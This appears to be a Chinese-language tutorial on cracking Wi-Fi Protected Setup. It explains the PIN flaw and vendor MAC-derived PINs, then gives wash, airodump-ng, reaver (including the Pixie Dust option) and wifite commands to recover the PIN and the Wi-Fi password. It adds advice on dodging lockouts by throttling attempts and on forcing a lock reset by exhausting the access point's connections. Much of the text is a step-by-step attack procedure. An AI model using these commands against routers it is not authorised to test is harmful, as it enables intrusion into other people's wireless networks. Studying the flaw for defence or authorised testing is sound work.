WPS 攻击

一、WPS (WIRELESS PROTECTED SETUP)基本介绍

• WPS是WiFi联盟2006年开放的一项技术
• 通过PIN码来简化无线接入的操作，无需记住PSK
• 路由器和网卡各按一个按钮就能接入无线
• PIN码是分为前后各4位的2段共8位数字
• 安全漏洞
• 2011年被发现安全涉及漏洞
• 接入发起方可以根据路由器的返回信息判断前4位是否正确
• 而PIN码的后4位只有1000中定义的组合(最后一位是checksum)
• 所以全部穷举破解只需要11000次尝试，
• 若采用8位的PSK（包含数字，大小写字母等），破解次数最高可达218,340,105,584,896次  
• 获得PIN后，可直接请求获取PSK
• 标准本身没有设计锁定机制，目前多个厂商已实现锁定机制（限制失败连接的尝试次数）
• 包括Linksys在内的很多厂家的无线路由器无法关闭WPS功能
• 即使在WEB节目中有关闭WPS，配置也不会生效
• 攻击难度相对较低，防御却十分困难
• 一般可在4-10小时爆破密码
• 用计算器直接算出PIN【早期部分厂商的PIN码是AP MAC的前三字节（转10进制）】
• 如：C83A35——13122101，00B00C——00045068

二、WPS 攻击演示

　　因缺设备，当前环境虽有支持WPS的AP，但都做了相应防护升级，所以以下仅演示破解的大体流程。真实破解成功效果可参见：https://www.cnblogs.com/qiyeboy/p/5825525.html

1、启动侦听模式后，发现支持WPS的AP

（1）方法一

wash -F -i wlan0mon

　　注，-F忽略错误信息

wash 命令

┌──(root💀kali)-[~]
└─# wash -h                   

Wash v1.6.6 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

Required Arguments:
        -i, --interface=<iface>              Interface to capture packets on
        -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
        -c, --channel=<num>                  Channel to listen on [auto]
        -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
        -O, --output-file=<filename>         Write packets of interest into pcap file
        -F, --ignore-fcs                     Ignore frame checksum errors
        -2, --2ghz                           Use 2.4GHz 802.11 channels
        -5, --5ghz                           Use 5GHz 802.11 channels
        -s, --scan                           Use scan mode
        -u, --survey                         Use survey mode [default]
        -a, --all                            Show all APs, even those without WPS
        -j, --json                           print extended WPS info as json
        -U, --utf8                           Show UTF8 ESSID (does not sanitize ESSID, dangerous)
        -p, --progress                       Show percentage of crack progress
        -h, --help                           Show help

Example:
        wash -i wlan0mon

（2）方法二

airodump-ng wlan0mon --wps

2、爆破PIN码

（1）方法一：直接爆破

reaver -i wlan0mon -b <AP mac> -vv

（2）方法二：利用漏洞获取

reaver -i wlan0mon -b <AP mac> -vv -K 1

　　注，reaver破解PIN码时，使用 -K 1 调用命令pixiewps测试AP是否存在漏洞，存在则依据漏洞获取，否则爆破。也可以单独使用pixiewps命令测试，该方法只适用于固定厂商的芯片，成功率很低

3、获取 PSK

reaver -i wlan0mon -b <AP mac> -vv -p 88888888

　　注，-p 指定PIN

4、可能存在的问题

• 很多厂家实现了锁定机制，所以爆破时应注意限速
• 一旦触发锁定，可尝试耗尽AP连接数，令其重启并解除WPS锁定

5、综合自动化无线密码破解工具wifite

　　可自动创建监听网卡，破解流程基本和前面的相同

演示